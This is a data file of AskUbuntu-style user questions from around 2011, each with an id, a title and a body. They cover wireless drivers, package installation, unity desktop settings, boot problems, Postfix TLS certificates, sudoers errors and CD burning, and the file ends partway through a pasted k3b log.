73730	unable to connect to detected wireless network while connects to wired	i 'm using a dual boot pc with windows and ubuntu 10.10 . ubuntu has underwent a fresh installation and now wireless connection is displayed as available but when i connect , it is unable to connect to internet.when i use a wired connection in ubuntu , i can access the internet and it works.the wireless connection works well when i use windows so i do n't see a problem with wireless router also my lappy with ubuntu can connect to it .i 'm using wired connection just for the time otherwise i use wireless.some of the output which may be helpful fore reference . lspci o/p : 00:00.0 host bridge : silicon integrated systems [ sis ] 671mx 00:01.0 pci bridge : silicon integrated systems [ sis ] sis agp port ( virtual pci-to-pci bridge ) 00:02.0 isa bridge : silicon integrated systems [ sis ] sis968 [ mutiol media io ] ( rev 01 ) 00:02.5 ide interface : silicon integrated systems [ sis ] 5513 [ ide ] ( rev 01 ) 00:03.0 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.1 usb controller : silicon integrated systems [ sis ] usb 1.1 controller ( rev 0f ) 00:03.3 usb controller : silicon integrated systems [ sis ] usb 2.0 controller 00:05.0 ide interface : silicon integrated systems [ sis ] sata controller / ide mode ( rev 03 ) 00:06.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:07.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 00:0d.0 communication controller : conexant systems , inc. hsf 56k data/fax modem 00:0f.0 audio device : silicon integrated systems [ sis ] azalia audio controller 00:1f.0 pci bridge : silicon integrated systems [ sis ] pci-to-pci bridge 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 771/671 pcie vga display adapter ( rev 10 ) 03:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 01 ) lshw -c network o/p : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 01 serial : 00:1d:7d:56:84:51 size : 100mb/s capacity : 100mb/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full ip=192.168.1.7 latency=0 link=yes multicast=yes port=mii speed=100mb/s resources : irq:43 ioport : ec00 ( size=256 ) memory : febff000-febfffff memory : febc0000-febdffff *-network description : wireless interface physical id : 1 bus info : usb @ 1:4 logical name : wlan0 serial : 00:21:91:1d : f7:5c capabilities : ethernet physical wireless configuration : broadcast=yes driver=rt73usb driverversion=2.6.35-22-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bg lsmod o/p : module size used by aes_i586 7280 0 aes_generic 26875 1 aes_i586 binfmt_misc 6599 1 snd_hda_codec_analog 59649 1 arc4 1165 2 snd_hda_intel 22107 2 snd_hda_codec 87552 2 snd_hda_codec_analog , snd_hda_intel snd_hwdep 5040 1 snd_hda_codec snd_pcm 71475 2 snd_hda_intel , snd_hda_codec snd_seq_midi 4588 0 snd_rawmidi 17783 1 snd_seq_midi snd_seq_midi_event 6047 1 snd_seq_midi rt73usb 22442 0 crc_itu_t 1383 1 rt73usb rt2x00usb 9779 1 rt73usb snd_seq 47174 2 snd_seq_midi , snd_seq_midi_event rt2x00lib 27275 2 rt73usb , rt2x00usb led_class 2633 1 rt2x00lib mac80211 231541 2 rt2x00usb , rt2x00lib snd_timer 19067 2 snd_pcm , snd_seq snd_seq_device 5744 3 snd_seq_midi , snd_rawmidi , snd_seq ppdev 5556 0 parport_pc 26058 1 cfg80211 144470 2 rt2x00lib , mac80211 snd 49006 13 snd_hda_codec_analog , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 880 1 snd sis_agp 4123 1 snd_page_alloc 7120 2 snd_hda_intel , snd_pcm shpchp 29886 0 agpgart 32011 1 sis_agp lp 7342 0 parport 31492 3 ppdev , parport_pc , lp usbhid 36882 0 hid 67742 1 usbhid usb_storage 40172 0 r8169 36489 0 sata_sis 3504 3 mii 4425 1 r8169 rfkill list wifi o/p : 0 : phy0 : wireless lan soft blocked : no hard blocked : no edit : http : //www.computerandyou.net/2011/10/how-to-solve-no-wireless-network-detected-in-ubuntu-11-10/ following the above link worked once but when i restart again i 'm unable to connect to internet .
73733	ask for password when root required	is there any way to make programs ask for password when root is required ? for example i want to extract some files with file roller into /usr/share/ where apparently root is required but instead of the error that it gives me i would like a password prompt .
73735	how do i install non-free java ?	how do i install non-free java in 11.10 ? i have read https : //help.ubuntu.com/community/java , however , it seems rather outdated . for example , it mentions adding lucid partner sources . is that really correct to do in 11.10 ? from the java help page : `` the sun java 6 packages are available from the partner repository . you can configure your system to use this repository via command-line : sudo add-apt-repository `` deb http : //archive.canonical.com/ lucid partner '' '' should i really do that in 11.10 ? i already have oneiric partner repository added . but sun-java packages are not available for install .
73737	problems with broadcom 4313 on 64-bit ubuntu 11.04	as the title says , i have issues with my wireless connection . almost every time i boot my laptop ( a dell inspiron n3010 ) , the wireless does n't work . i need to plug in my network cable and reboot the computer for the wireless to start functioning . output of lspci -nn | grep wireless : 04:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) output of lshw -c network : *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 logical name : eth1 version : 01 serial : 68 : a3 : c4:10:7d : d7 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.100.82.38 ip=192.168.2.104 latency=0 multicast=yes wireless=ieee 802.11 resources : irq:17 memory : f0300000-f0303fff i looked at the solution given here , but i do n't understand how i can install the recommended driver .
73747	edge reveal timeout for unity 2d	i am using unity 2d , and i want to change the edge reveal timeout for unity 2d launcher . but compiz-setting-manager is not working for it . i think 2d and 3d do n't share common settings . so , how can i change edge reveal timeout for unity 2d ( currently its too slow ) ?
73751	change user on 11.10 hangs system	when a user locks the screen and another user tries to enter , the system first paints the white space for the password textbox , but does n't put the cursor in it . afterwards , no textbox appears , so the first user can not enter the system neither . system shutdown or restart does n't seem to work neither , so the only option is a hard reboot ( maintain the power button pushed until the computer powers down ) . the question is if there is a way to prevent this from happening ( without having to logout every time ) ? just filed a bug report in launchpad .
73755	installation of ubuntu system update was interrupted . now i can not boot . please help ?	the problem : i was asked by a pop-up window whether i wanted to upgrade to a new version of ubuntu . i clicked yes , and followed prompts . i then left it to get on with its thing as it seemed to be taking a while . unfortunately my netbook , which wasnt plugged in , ran out of battery before the installation was completed . when i next attempted to boot up ubuntu i just get the main loading page with the dots under the word ubuntu . it never progresses from that point . i need a fix . i realise there are existing threads on this topic but i ca n't understand the responses to them . if you can help me to sort this problem out then its important for you to understand that i have zero knowledge of ubuntu or how it works . a friend set me up on ubuntu in the first place and by and large i 've never had any problems so have n't had to fiddle with code . i 've been running ubuntu alongside windows ( i 'm on windows now ) , on a split hard drive . as i can no longer boot ubuntu i can no longer access any of the files on the ubuntu half of the hardrive . to give you an idea of where i 'm at , i have a vague idea that there 's a thing called a terminal and at a push i might work out how to open it . at this point , confronted by an utterly perplexing code , i give up . i repeat , i do not know what sudo is . i do not know anything whatsoever about commands or how they work . i 'm willing to learn but i need talking through this step by step . assume i know nothing and you 'll be spot on . if someone could help me with this i would be very grateful as there are an awful lot of files in limbo which i 'd dearly like to regain access to .
73756	rtl text in emacs	i 'm using emacs to write my thesis . i need to create a hebrew abstract . is there a way to enable right-to-left text display in emacs ? ( the correct answer should be how can i enable right-to-left text in emacs ? )
73760	how do i get 'rar ' package ?	i recently installed another ubuntu after a long time and i 'm trying to install 'rar ' package on it as i use that for compression from within terminal . 'rar ' is n't found when i do apt-get install rar i have even tried doing apt-get update but even after then ubuntu can not find 'rar ' . so how do i get it ?
73763	how can i remove the white dots in login screen on ubuntu 11.10	i want to customize the login screen from ubuntu 11.10 but i cant find the location of the white dots . i know how to change the background image but i can find the location of the white dots . greets from tinuz
73767	how to stop the unity desktop	i would like to shutdown the graphical interface and every related graphical application on my ubuntu 11.10 ( with 4 gib memory and 4 gib swap ) temporarily in order to free up memory . how can i achieve this ? i try to reduce memory consumption because i am doing very memory intensive computations ( sat solving with 1.25 million clauses ) which easily consumes 4 gib of memory and more . i want to prevent swapping for as long as possible because this will slow down the computations considerably .
73774	ca n't boot into ubuntu , keeps returning to grub	i installed ubuntu yesterday but it does not work when i try to access it . instead it sends me to grub 1.99 . what can i do to make it work normally ? what are the commands that i have to give for it to function normally ?
73775	tortoisehg keyring extension configuration	i have tortoisehg ( 2.1.1 ) installed on ubuntu 10.10 and it is working correctly . i would like to configure the keyring extension but am having trouble finding the mercurial.ini file on my system as stated in the directions . any help would be appreciated .
73778	any solution for `` no dial tone '' when connecting modem to internet	problem when connecting modem ( zte ac682 ) to internet -- > wvdial : internet dialer version 1.61 -- > can not get information for serial port . -- > initializing modem . -- > sending : atz atz ok -- > sending : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 ok -- > modem initialized . -- > sending : atdt # 777 -- > waiting for carrier . atdt # 777 no dialtone -- > no dial tone . -- > disconnecting at sun oct 30 11:54:26 2011
73782	my windows do not resize when i drag them on top or on side of my screen	i 'd like to have them resizing automatically to half or full screen by moving the window to a border of the screen . i use ubuntu 11.10 . fresh install .
73784	no audio when plugging external monitor through hdmi	if i plug my external monitor through hdmi , i lose audio in my laptop . my external monitor does n't have audio , so i want to keep the audio in the laptop 's speakers . how can i do that ?
73788	verify email address	are there any software in ubuntu that verify email address ( not syntax , email exists or not ) . i need a software or script or anything to check that a email address exits or not ( not email syntax ) . thanks in advance
73789	why syntax error near unexpected token ' fi '	# ! /bin/bash # # # # echo -e `` please insert user name : '' read un echo `` $ un '' len= $ { # un } echo `` $ len '' ze=0 te=10 if [ `` $ len '' -eq `` $ ze '' ] than echo `` no argument '' exit fi if [ `` $ len '' -ge `` $ te '' ] than echo `` the argument maximum 10 alphanumeric '' exit fi
73795	i seemed to have deleted my kernel pae headers how do i recover ?	i accidentally deleted the live kernel headers with pae while cleaning my old kernel headers . i am using ubuntu 10.04 netbook remix . how can i recover . i booted with my usb loaded with ubuntu and all data is intact . urgent help is required ...
73804	wrong login screen resolution	excuse me if this has been answered already , but i could n't find any questions quite matching my issue . on the odd occasion , usually after incorrectly restarting my computer , my login screen resolution is not the default 1440x900 , but i think 1600x900 . now , i have this monitor that 's really bad at handling resolutions it 's not designed to handle , and will show a silly `` wrong resolution '' box jumping around the screen . is there any way to make the login screen load a 1440x900 resolution no matter what ? i 'm running ubuntu 11.10 with unity and lightdm .
73805	how to enable concertina effect ?	the launcher in ubuntu 11.10 has no concertina effect like it had in ubuntu 11.04 . does anyone know how to enable this function ? take a look at the picture to understand what is the concertina effect .
73806	why is my rubbish bin icon in unity launcher opening with gwenview ?	i guess the question says it all =/ already installed ubuntu tweak and fiddled with the associations , but nothing is associated with gwenview . still , the rubbish bin opens up with it instead of nautilus . how can i fix it ?
73808	why do i have to install apache2-utils when installing node.js ?	i 'm about to install node.js ( question about installing ) . it says that i have to install some packages first for using git and stuff if i 'm running a clean server , which i actaully do : sudo apt-get install g++ curl libssl-dev apache2-utils git-core okay - everything 's good so far . but why should i install some apache stuff , when i only want to use node.js ? do i really need that ? this question is only relevant for people , who want to compile node themselves . i recommend using the simpler and safer apt-get method .
73809	how submit a bug fix to ubuntu ?	i 've submitted a 'papercut ' bug to launchpad , that i think i can possibly have a go at fixing . what is the process for obtaining the relevant source code ( i 'm not entirely sure where i 'd find the code responsible ) and then submitting the change back to ubuntu ?
73811	extra space before brackets	when i type something anywhere ( bash , eclipse , this field ) and open a bracket , ubuntu adds a space before it . so instead of : code ( ) i get code ( ) . this creeps me out . how can i stop it doing that ?
73813	how to change default launchers in the unity dashboard ?	how can i change the default applications showed when i open unity . at the moment it 's chromium , openshot , thunderbird and banshee . i 'd like to replace the banshee starter with a customized icon and command . i 'm using ubuntu 11.10 thank you !
73818	kubuntu - can not change fonts and widget style under sudo after upgrade to 11.10	i have a problem with fonts , appearance of gtk and kde-based applications and cursors in kubuntu 11.10 after upgrade from 11.04 . i want all of my applications , both gtk and kde , under sudo and under my normal user , to look the same ( using standard oxygen theme and arial font ) . my usual way works only partially , here are the steps i usually do : set up kde widget style to oxygen under my normal user ( already set by kubuntu installation ) , set up kde ui fonts to arial . set up gtk widget style to oxygen-gtk under my normal user ( already set by kubuntu installation ) , set gtk fonts to be the same as kde fonts . set up gtk style for some non-kde-aware gtk apps , using gtk-theme-switch2 and gtk-chtheme , to oxygen-gtk , set up ui font to arial . repeat steps 1-3 for widget style and fonts under kdesudo . however , not all applications look in oxygen and use arial font after these steps after upgrading to kubuntu 11.10 from 11.04 . below are all screenshots i wanted to illustrate this question , merged into single image , due to askubuntu.com does not allow me to post more than one link or an image at the moment : http : //simplest-image-hosting.net/png-0-screenshots-merged software-properties-gtk under sudo looks like the first picture from the link above ( marked software-properties-gtk ) . strange , setting gtk wigdet style using gnome-control-center looks like second picture from the link above ( marked gnome-control-center ) , there is no oxygen-gtk theme ( could this fact be related to the problem ? ) in kdm , cursor is ubuntu default cursor ( dmz white ) , and not oxygen ( this happened after installing gnome ) - how can i change it ? in kde applications under kdesudo , fonts remain ubuntu and do not change after i set them to my typical arial font i use for ui , screenshot is the last picture from the link above ( marked kcmshell4 fonts ) . sometimes , in kde applications under my ordinary user , fonts spontaneously change to ubuntu font - why this happens and how can i avoid it ? thanks .
73821	how can i configure alt+tab and the launcher to only show apps in the current workspace ?	i do n't like that when i press alt+tab i see all open apps in all workspaces . how can i see in the alt+tab menu and in the launcher only the programs that i am using in that particular workspace ? i feel there 's no point of using alt+tab and the launcher if you have opened lots of programs in different workspaces . hope you understand , please help . thank you very much .
73822	startup programs in particular workspace	is it possible to do that ? because i always open a few programs for developing in one workspace , music in another and so on . is it possible to make it automatic ? thank you .
73824	how to configure unity icons for programs not apt-installed ?	i 've got a couple programs that i compile myself to use newer/different versions than are in the repos , and i 've managed to get the dash and other parts of the desktop to recognize them by modifying my $ path in ~/.profile , but it 's obviously not picking up the icons , too . i 've tried adding .desktop files to ~/.local/share/applications , but they 're still not being used . i guess i probably want to add my libdir ( ~/.opt ) to unity 's overall environment , but i 'm not sure if that 's the right direction .
73825	system testing hangs inexplicably	i read that i can upload system testing reports to ubuntu site and was excited with it . but my last three efforts looks like gives me a hung 'system testing ' process or it appears so for about an hour each . how i can find out what is happening and if it indeed hung ? https : //launchpad.net/+login says i am already logged in , but i do not see any progress ( or even unable to close the window as well ) i am attaching the screen shot as well :
73828	option to sync to google calendar does n't show up in evolution	i did a clean installation of oneiric and since evolution is not included by default , i added it by doing apt-get install evolution . however , when i try to create a new calendar and sync it with google i only get three options : `` on this computer '' , `` on the web '' and `` weather '' . there used to be an option to include google calendars but it is not there now . it appears , though , in another computer that i upgraded from natty so i assume that the option still exists . what package am i missing ?
73830	removing a package and related files/folders , then re-adding tomcat caused some issues	so i was playing around with a ubuntu 11 vps , and i installed tomcat using apt-get , and after some time i messed something up , and instead of figuring out the issue i thought i could just remove the package and start over . sudo apt-get remove tomcat6 i noticed when i removed the package , the folders that tomcat used were still around , so i deleted them : /etc/tomcat6 /var/lib/tomcat6/ /usr/share/tomcat6 when i tried to install the package again , there were some errors as it was trying to look for files in i believe /usr/share/tomcat6 ( i do n't recall now ) . did i miss a step or something , should n't have this theoretically worked ?
73832	where are the reports submitted from system testing displayed ?	with 11.10 , i read somewhere that a site where we can upload the system testing reports . what is the url of the site where i can refer the results uploaded by other users ?
73833	is this the new icon theme for ubuntu 12.04 ?	is this the new icon theme for ubuntu 12.04 ? http : //www.yellowicon.com/portfolio/icons/ubuntu canonical shows up on the yellowicon clients list . http : //www.yellowicon.com/clients
73836	segmentation fault and xlib when starting hugin	when i 'd like to start hugin i get this error message : benjy @ w520 : ~ $ hugin ( hugin:6376 ) : gtk-warning ** : im modulpfad »pixmap« konnte keine themen-engine gefunden werden , ( hugin:6376 ) : gtk-warning ** : im modulpfad »pixmap« konnte keine themen-engine gefunden werden , ( hugin:6376 ) : gtk-warning ** : im modulpfad »pixmap« konnte keine themen-engine gefunden werden , ( hugin:6376 ) : gtk-warning ** : im modulpfad »pixmap« konnte keine themen-engine gefunden werden , xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . xlib : extension `` glx '' missing on display `` :0 '' . speicherzugriffsfehler benjy @ w520 : ~ $ speicherzugriffsfehler this means segmentation fault i have no idea what the problem could be ... thanks for any help greetings benjy
73842	rt2800 wireless keeps disconnecting	my hp dm1 laptop has a rt2800sta wlan driver . my wireless does n't usually have a problem connecting to a network , yet sometimes it does . the biggest issue i have found is that when it does connect , it does n't stay connected . it continually connects and disconnects to the network . does anyone know why this is happening , and how i would go about fixing the issue ? thank you and look forward to trying your solutions .
73845	modem network disconnected . you are now offline	i 'm a new user of linux environment . i 'm using ubuntu 11.10 and a mts mblaze usb modem . i have installed it correctly and it was working good at first but when i restarted my system then i was unable to connect my modem again . whenever i want click on that mts connection , a message prompts up `` modem network disconnected . you are now offline . '' please help to get me out of this problem . thanks & regards .
73847	make my ubuntu a live disk from my hard disk	is there any way to create a ubuntu live disk that includes all apps in my pc ? i installed a lot of apps & gnome 3.2 on my ubuntu 11.10 & i want to share them with my friends on a disk that is live & able to install my distro on their pcs . do you have any idea ?
73850	unity 3d , compiz effects and intel sandybridge mobile graphics	my notebook is a pavilion dv6-6030el with an intel i7-2630qm cpu , 8 gb of ram and the ati hd 6490m as vga dedicated . i was forced to stop it due to the switchable graphics issue editing the grub and rc.local files , so right now the notebook is running with the only intel sandybridge mobile graphics chip ( i 've earned something like +400 % of battery life after this trick ) , i 'm running ubuntu 11.10 with unity 3d , x.org intel drivers and mesa drivers are installed but i ca n't make compiz and advanced graphics effects to work . i 've seen many videos on youtube with older and worser vga running compiz at full capabilities while here the `` experience '' rate is only `` standard '' . i 've installed also the compizconfig settings manager but i ca n't even change the size of the unity dash icons . thanks for your attention , i 'm looking forward for any kind of help : )
73859	fan runs constantly on an acer aspire s3	i have a new acer aspire s3 notebook and problems with the fan . after installing ubuntu 11.10 ( but also with the xubuntu live-disc ) the fan is running constantly . is there any possibility to : stop the fan manually to see the heat development adjust the fan-control reduce the processor load or something else to reduce the produced heat has anybody experience with this system ? 2011-10-31 : i also tried the sensors-detect command from the lm-sensors package and sudo pwmconfig . it responds : /usr/sbin/pwmconfig : there are no pwm-capable sensor modules installed since i have to decide fast whether to return the notebook or not i also posted the question in this forum . i hope that is ok. any hint is very much appreciated .
73860	why does n't file detect the mime-type of mp3 properly ?	something odd i recently encountered , running file -- mime-type on a collection of mp3 gets the mime-time wrong a third of the time : $ for i in */*.mp3 ; do cat `` $ i '' | file -- mime-type - ; done | sort | uniq -c 140 /dev/stdin : application/octet-stream 309 /dev/stdin : audio/mpeg there does n't seem to be any obvious reason , as even mp3s from the same source , will sometimes fail and sometimes not . bug , feature or anything obvious i am missing here ?
73864	how to modify a invalid /etc/sudoers file ? it throws out an error and not allowing me to edit again	how do i edit an invalid visudo file ? here is what happens : $ sudo visudo > > > /etc/sudoers : syntax error near line 28 < < < sudo : parse error in /etc/sudoers near line 28 sudo : no valid sudoers sources found , quitting
73865	postfix + gmail . certificate verification failed	i have setup my system to send emails via gmail . the system works in so far as i can send emails , however i 'm getting an error regarding the secure certificate . this is an example entry in the mail.log : oct 29 12:17:27 durban postfix/smtp [ 20742 ] : setting up tls connection to smtp.gmail.com [ 209.85.143.108 ] :587 oct 29 12:17:27 durban postfix/smtp [ 20742 ] : certificate verification failed for smtp.gmail.com [ 209.85.143.108 ] :587 : untrusted issuer /c=us/o=equifax/ou=equifax secure certificate authority oct 29 12:17:27 durban postfix/smtp [ 20742 ] : untrusted tls connection established to smtp.gmail.com [ 209.85.143.108 ] :587 : tlsv1 with cipher rc4-sha ( 128/128 bits ) oct 29 12:17:29 durban postfix/smtp [ 20742 ] : ba4852a1bfa : to= < some @ email.com > , relay=smtp.gmail.com [ 209.85.143.108 ] :587 , delay=2.9 , delays=0.1/0.1/1.3/1.4 , dsn=2.0.0 , status=sent ( 250 2.0.0 ok 1319887049 l20sm20686943wbo.6 ) i googled this issue and have found others with the problem who were able to solve it by updating a file called cacert.pem in the /etc/postfix directory . in my main.cf i have the following line ( amongst others ) : smtpd_tls_cafile=/etc/postfix/cacert.pem i have this file : -rw-r -- r -- 1 root root 2298 2011-10-29 12:16 cacert.pem i populated this file with the commands : # cat /usr/lib/ssl/certs/equifax_secure_ca.pem > > /etc/postfix/cacert.pem # cat /usr/lib/ssl/certs/thawte_premium_server_ca.pem > > /etc/postfix/cacert.pem i believe the first line should suffice and the second line ( certificate ) is an old no longer used ( by google ) certificate . i do n't know what else i can change and do n't have any idea on what else to search for or which logfiles to check . any hints appreciated .
73866	how to sync my music and photos with windows phone 7 device ?	is there is anything like a zune or windows phone connector for ubuntu ? please help .
73867	the volume `` filesystem root '' has only 0 bytes disk space remaining ?	i installed 11.10 ~two weeks ago and run into some strange troubles recently . installation was on brand new laptop with clear 160gb ssd . i opted for encrypting home directory . apart from that i accepted defaults during the installation . there is no other os on my laptop . i had circa 40gb in use when ( for the third time ) i got to see this very unpleasant window : twice situation was pretty bad and whole system slowed down considerably . after reboot i could not login to graphical interface ( with an error message informing about insufficient space ) and had to remove some files from command line first . third time i still managed to quickly delete some files and it helped . my laptop is mainly work environment : so no torrents , games , just two movies . only media filling space are ~20gb of pictures , and bunch of pdfs . working mostly on postgresql & postgis , geoserver and qgis recently . although i had lots of opportunities to test and practice my backups i would be extremely grateful if somebody could point me to any potential solutions to this problem . my laptop has been bought just before i installed ubuntu , and it came without os . could that be hardware issue ? or is the encrypted home causing me headaches ? thanks for help ! update 1 : as suggested by @ maniat1k , here is current output of fdisk -l : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sda1 1 312581807 156290903+ ee gpt update 2 : as suggested by zanfur , output of df : filesystem 1k-blocks used available use % mounted on /dev/sda2 149802648 31411456 110781576 23 % / udev 1959764 4 1959760 1 % /dev tmpfs 788276 992 787284 1 % /run none 5120 0 5120 0 % /run/lock none 1970684 2716 1967968 1 % /run/shm /dev/sda1 19363 129 19234 1 % /boot/efi /home/rdk/.private 149802648 31411456 110781576 23 % /home/rdk and sudo parted -l : model : ata intel ssdsa2bw16 ( scsi ) disk /dev/sda : 160gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 17.4kb 20.0mb 20.0mb fat16 boot 2 20.0mb 156gb 156gb ext4 3 156gb 160gb 4177mb update 3 : yet another window with low memory message : / working recently mostly on virtualbox and using remmina . following this information i deleted virtually everything from my home directory . rebooted . there was ~20gb in use after that [ ~10gb for virtualbox disk image which i wanted to keep if possible ] . following sarveshlad comment i was trying to recover more space and running bleachbit application when i got another error of low space on hd . then the system froze . how on earth can my ubuntu fill up hd with over 100gb within minutes ?
73868	aptitude state is corrupt - how do i fix it ?	it appears that the aptitude state is corrupt - note that apt-get and the other dpkg tools still work fine . is there some way to reset the state of aptitude ? signs of corruption : aptitude search shows packages as 'p ' ( purged/never installed ) when they are installed . if i try and aptitude safe-upgrade it tells me i need to uninstall half my system ! but apt-get upgrade and the gui update manager continue to work fine . i find aptitude search very handy because of the package state information , so i would like to get that back again . note i am using 11.10 , though i originally installed 9.10 and have upgraded through each release ( and generally upgraded when the next release was in beta ) .
73869	how do i install xfce so i can choose it as the desktop environment at login ?	i am currently running the vanilla ubuntu 11.10 on my laptop . at first i liked the unity desktop ( the previous version i used was 10.04 lts ) and thought that i could live with it . but after about a week of usage , i can feel that it 's causing some really annoying lags . so i switched to unity 2d . the performance was a little better but still , the system lags . now i want to install xfce and use it as my desktop environment . i was thinking that installing xubuntu-desktop would be able to do the job but i am afraid it will overwrite the unity desktop ( which i still want to keep ) . so basically i am asking how to install xfce so that it will be an option in the de at the login screen ?
73871	unity 3d not longer working after upgrade on a ubuntu g560	i 've made progress identifying the problem . this is an intel driver problem . the latest ppa driver for xserver-xorg-video-intel ppa.8.2 has been reported to work . however attempting to use synaptic to install the natty package produces a broken package not surprisingly . the latest intel video drivers on oneiric appear to produce a segmentation fault in geis_init . i upgraded one computer to oneiric but until compiz loads i can not proceed with the upgrade . i would include the compiz log on install but it is virtually identical to the one which refers to unity 3d not working on a quadro nvs
73873	how can i change the wireless pasword from the terminal ?	hello i 've recently installed ubuntu 10.04 and entered a wrong password for my apartment 's wireless network . upon entering the network options to edit the password it will allow me to delete it and rewrite but not to save , the save edit button disappears . i have already tried deleting and recreating the connection but it starts up with the incorrect password already in , also restarting both my wirelesses and laptop have failed . i feel i 'm forgetting some permissions or something and that i should be able to change it from the terminal . i will accept any solutions but please do n't suggest upgrade to the newest edition there 's a reason i 'm running the old one .
73875	how to do auto-login without leaving your account open to everyone ?	i always use only one account on my computer . i do have a lot of programs in startup and i need them all . the problem is that they take some time to load ( for example eclipse ) . is there any way to do auto-login on the account and lock screen so no-one else can use my account ?
73882	authenticate user that has no password ?	i 've set up my user account so that no password is required to login and i need to install some updates . however when prompted for the password , it says authentication failed if i leave the box blank . i do n't have a password , how am i supposed to authenticate ? edit i tried the method in reset lost administrative ( root ) password but it came out with an error : authentication token manipulation error password unchanged . what does this mean ?
73884	unable to burn to cds with brasero or k3b ( cdrecord and cdrao ( ? ) ) both fail . what causes this ?	i can not burn any cds ( first time i 've tried since upgrading to 11.10 to my memory ) . the media i 'm using are 56x capable cd-rs , and i 'm using the same dvdrw/bluray drive that came with my hp laptop ( dv7 1020us ) . here is the output k3b ( i lost the brasero output somehow ) : devices -- -- -- -- -- -- -- -- -- -- -- - optiarc bd rom bc-5500s 1.83 ( /dev/sr0 , cd-r , cd-rw , cd-rom , dvd-rom , dvd-r , dvd-rw , dvd-r dl , bd-rom , dvd+r , dvd+rw , dvd+r dl ) [ dvd-rom , dvd-r sequential , dvd-r dual layer sequential , dvd-r dual layer jump , dvd-ram , dvd-rw restricted overwrite , dvd-rw sequential , dvd+rw , dvd+r , dvd+r dual layer , cd-rom , cd-r , cd-rw , bd-rom ] [ sao , tao , raw , sao/r96r , raw/r96r , restricted overwrite , layer jump ] [ % 7 ] k3b : :isoimager -- -- -- -- -- -- -- -- -- -- -- - mkisofs print size result : 77112 ( 157925376 bytes ) system -- -- -- -- -- -- -- -- -- -- -- - k3b version : 2.0.2 kde version : 4.7.2 ( 4.7.2 ) qt version : 4.7.4 kernel : 3.0.0-13-generic used versions -- -- -- -- -- -- -- -- -- -- -- - mkisofs : 1.1.11 cdrecord : 1.1.11 cdrecord -- -- -- -- -- -- -- -- -- -- -- - scsidev : '/dev/sr0' devname : '/dev/sr0' scsibus : -2 target : -2 lun : -2 linux sg driver version : 3.5.27 wodim version : 1.1.11 scsi buffer size : 64512 beginning dma speed test . set cdr_nodmatest environment variable if device communication breaks or freezes immediately after that . toc type : 3 = cd-rom xa mode 2 driveropts : 'burnfree' device type : removable cd-rom version : 5 response format : 2 capabilities : vendor_info : 'optiarc ' identification : 'bd rom bc-5500s ' revision : '1.83' device seems to be : generic mmc2 dvd-r/dvd-rw . current : 0x0009 ( cd-r ) profile : 0x0040 ( bd-rom ) profile : 0x002b ( dvd+r/dl ) profile : 0x001b ( dvd+r ) profile : 0x001a ( dvd+rw ) profile : 0x0016 ( dvd-r/dl layer jump recording ) profile : 0x0015 ( dvd-r/dl sequential recording ) profile : 0x0014 ( dvd-rw sequential recording ) profile : 0x0013 ( dvd-rw restricted overwrite ) profile : 0x0012 ( dvd-ram ) profile : 0x0011 ( dvd-r sequential recording ) profile : 0x0010 ( dvd-rom ) profile : 0x000a ( cd-rw ) profile : 0x0009 ( cd-r ) ( current ) profile : 0x0008 ( cd-rom ) ( current ) profile : 0x0002 ( removable disk ) using generic scsi-3/mmc cd-r/cd-rw driver ( mmc_cdr ) . driver flags : mmc-3 swabaudio burnfree supported modes : tao packet sao sao/r96r raw/r96r drive buf size : 3299328 = 3222 kb fifo size : 12582912 = 12288 kb speed set to 2822 kb/s track 01 : data 150 mb total size : 172 mb ( 17:08.18 ) = 77114 sectors lout start : 173 mb ( 17:10/14 ) = 77114 sectors current secsize : 2048 atip info from disk : indicated writing power : 5 is not unrestricted is not erasable disk sub type : medium type a , high beta category ( a+ ) ( 3 ) atip start of lead in : -11634 ( 97:26/66 ) atip start of lead out : 359846 ( 79:59/71 ) disk type : short strategy type ( phthalocyanine or similar ) manuf . index : 3 manufacturer : cmc magnetics corporation blocks total : 359846 blocks current : 359846 blocks remaining : 282732 starting to write cd/dvd at speed 16.0 in dummy tao mode for multi session . last chance to quit , starting dummy write in 2 seconds . 1 seconds . 0 seconds . operation starts . waiting for reader process to fill input buffer ... input buffer ready . starting new track at sector : 0 track 01 : 0 of 150 mb written . track 01 : 1 of 150 mb written ( fifo 96 % ) [ buf 32 % ] 309.3x . track 01 : 2 of 150 mb written ( fifo 93 % ) [ buf 65 % ] 351.8x . track 01 : 3 of 150 mb written ( fifo 90 % ) [ buf 96 % ] 346.3x . track 01 : 4 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 1.6x . track 01 : 5 of 150 mb written ( fifo 100 % ) [ buf 100 % ] 8.5x . track 01 : 6 of 150 